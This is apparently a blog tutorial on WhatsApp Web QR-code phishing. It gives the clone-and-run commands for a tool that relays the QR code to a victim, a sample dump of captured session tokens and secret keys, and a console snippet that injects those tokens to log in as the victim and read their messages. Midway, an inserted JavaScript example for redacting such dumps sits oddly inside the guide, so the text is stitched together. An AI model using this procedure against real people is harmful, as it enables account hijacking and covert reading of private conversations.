A 2021 GUIDE TO WHATSAPP PHISHING USING QR CODE

Hustlers, how are you today? A while ago we wrote an article about how to sign up and verify international numbers on WhatsApp. Today, however, you will learn a lot about WhatsApp phishing using nothing but its own QR code.

By the end of this article, you will be able to extract the QR code from WhatsApp Web and display it on a new page.

When your target scans the QR code using WhatsApp, the program grabs the credentials from the web client and saves them in a file. You can then use that file to log yourself in as the target who scanned the QR code and check their messages and history. What's even cooler is that every time they receive a message, you will receive that message too. Isn't that cool?

HOW DOES IT WORK?

This uses node.js and socket.io for the website, and selenium, a tool for scripting browsers, to communicate with the WhatsApp web client. It sounds daunting and overly complicated to those who are not familiar with programming, but we can assure you that we will make it easy as a breeze.

The program starts an HTTP server and a socket.io server. When a new client connects to socket.io, the application asks a selenium instance to start a new browser and connect to web.whatsapp.com. It fetches the QR code data and sends it to the client over the WebSocket connection. The client JavaScript then shows the QR code to the user.

If the QR code gets scanned, WhatsApp will authenticate the selenium-controlled browser and store some tokens in localStorage and the document cookie. We extract that data and save it into a text file. It will look like the sample below:

CODE

{
"s":{
"remember-me":"true",
"WAVersion":"\"0.1.4391\"",
"qwefsdafadsdf==":"false",
"debugCursor":"146",
"WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}",
"WAToken2":"\"0.asldkamäsdflkasdfasdf\"",
"WAWamLastRotate":"1439140177924",
"WALangPref":"\"de-DE\"",
"WAWamStatus":"\"completed\"",
"y8fY/zQ8P+asdfadfg==":"[
...
]",
"WAToken1":"\"asdf+ams,dfhlaskdjfhasdfasdf=\"",
"Dexie.DatabaseNames":"[\"wawc\"]",
"storage_test":"storage_test",
"LKAJsdlksdjfasdf==":"false",
"logout-token":"\"alkjsdhfkjashldkjpweoaLKNKASBkasjbdaksdjLKjhhndosiaosa;AljkhJKhlKAJShkljqjDJSAOlkjbnhasdklWAdm==\"",
"ver":"1",
"whatsapp-mutex":"\"x781239870495:init0.987123490234\"",
"WASecretBundle":"{\"key\":\"sldkfjsdf+asdlfijlasdkjfasdf=\",\"encKey\":\"asldkfjasldkfjsdfsdf0=\",\"macKey\":\"a,sdfasdf+alskdjföalskdhiopasdf=\"}",
"WABrowserId":"\"aö,ksdjflöasdf==\""
},
"c":""
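For responders who recover a file in this format from a phishing host, the following added example (not part of the original page or of the tool it describes) produces a copy that can be kept as evidence without holding replayable session material. The list of sensitive key names is an assumption drawn from the sample above, and `SAMPLE` is constructed input.

```javascript
// Added example: redact a recovered token dump before it is stored as evidence.
// Assumption: these key names (taken from the sample above) carry session material.
const SENSITIVE_KEYS = new Set([
  'WAToken1', 'WAToken2', 'WASecretBundle', 'WABrowserId', 'logout-token',
]);

function mask(value) {
  return `[REDACTED ${String(value).length} chars]`;
}

// Redact one localStorage value. Values in the dump are JSON-encoded strings,
// so a bundle such as WASecretBundle is parsed and masked field by field.
function redactValue(raw) {
  try {
    const parsed = JSON.parse(raw);
    if (parsed && typeof parsed === 'object' && !Array.isArray(parsed)) {
      const out = {};
      for (const [k, v] of Object.entries(parsed)) out[k] = mask(v);
      return JSON.stringify(out);
    }
  } catch (_) { /* not JSON: fall through and mask the raw string */ }
  return mask(raw);
}

// Returns { redacted, findings }: a safe copy of the dump plus the list of
// fields that held replayable material, for the incident record.
function redactDump(dump) {
  const redacted = { s: {}, c: '' };
  const findings = [];
  for (const [key, value] of Object.entries(dump.s || {})) {
    if (SENSITIVE_KEYS.has(key)) {
      redacted.s[key] = redactValue(value);
      findings.push(`localStorage:${key}`);
    } else {
      redacted.s[key] = value;
    }
  }
  // Cookies: keep names, mask every value, since any of them may be a session cookie.
  redacted.c = String(dump.c || '').split(';').map((p) => p.trim()).filter(Boolean)
    .map((pair) => {
      const name = pair.split('=')[0];
      findings.push(`cookie:${name}`);
      return `${name}=${mask(pair.slice(name.length + 1))}`;
    }).join('; ');
  return { redacted, findings };
}

// Constructed sample input, not real credentials.
const SAMPLE = { s: { ver: '1', WAToken1: '"abc+def="',
  WASecretBundle: '{"key":"k1","encKey":"e22","macKey":"m333"}' }, c: 'sid=xyz; lang=de' };
```

The `findings` list names each redacted field, which is enough to tell the affected user to log out all linked devices from the phone.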

You can then import these tokens into your browser and log in as the person who scanned the QR code. Still confused?

Just follow along and you will be amazed at how simple it actually is.

INSTRUCTIONS

  • Download the selenium standalone server jar file and install Firefox if you don’t already have it.
  • Type the following into your terminal

CODE

$ java -jar selenium-server.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js

Once you have done that, follow these steps:

  • Open your browser and go to http://localhost:8080
  • Start WhatsApp on your smartphone, go to Menu > WhatsApp Web and scan the QR code from your browser.
  • Copy the content from the newly created secrets file.
  • Open web.whatsapp.com. (Make sure you are not already logged in; maybe use incognito mode.)
  • Open your developer console

In that developer console you will copy/paste the following code:

CODE

var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)

Great job! Now reload the page and, surprise surprise, you should be logged in as the person who scanned the QR code.

Was it that difficult? Things are easy when you know how to do them. Congrats, today you have learned yet another amazing guide to keep in your knowledge arsenal.

 

What are you waiting for? Meanwhile, we will see you on the other side!

 
